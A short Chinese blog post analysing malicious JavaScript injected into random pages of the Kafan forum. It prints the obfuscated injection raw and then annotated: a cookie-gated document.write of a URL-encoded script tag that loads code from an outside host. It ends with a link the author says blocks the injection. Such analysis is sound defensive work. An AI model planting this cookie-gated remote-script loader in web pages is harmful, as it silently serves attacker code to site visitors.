4月25日挂马分析报告[已清除]

 

这回重点是~~卡饭被挂马~~

卡饭随机页面被嵌入恶意代码

JavaScript代码
  1. if(document.cookie.indexOf('hello')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='hello=Yes;path=/;expires='+expires.toGMTString();document.write(unescape("%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%27%6A%61%76%61%73%63%72%69%70%74%27%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%68%70%35%34%30%2E%77%65%65%64%6E%73%2E%63%6F%6D%2F%62%2E%6A%73%27%3E%3C%2F%73%63%72%69%70%74%3E"));}  

顺手做了个注解,大家勉强看吧

JavaScript代码
  1. if (document.cookie.indexOf('hello') == -1) { //如果COOKIE不存在HELLO则执行下面代码:   
  2.   
  3.     var expires = new Date(); //声明变量expires等于当前日期   
  4.   
  5.     expires.setTime(expires.getTime() + 24 * 60 * 60 * 1000); //对得到的时间进行修改   
  6.   
  7.     document.cookie = 'hello=Yes;path=/;expires=' + expires.toGMTString(); //写入COOKIE:hello=Yes;path=/;expires=(上面修改后的时间)   
  8.   
  9.     document.write(unescape("%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%27%6A%61%76%61%73%63%72%69%70%74%27%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%68%70%35%34%30%2E%77%65%65%64%6E%73%2E%63%6F%6D%2F%62%2E%6A%73%27%3E%3C%2F%73%63%72%69%70%74%3E")); //执行挂马代码   
  10. }  

顺手再做了个~~东西·~~以毒攻毒~~访问以下页面挂马页就不会生效了(只适用于目前挂马):

http://xuanwobbs.com.cn/kafan.htm

为何不留个言呢?

我要把我的最新文章显示在这!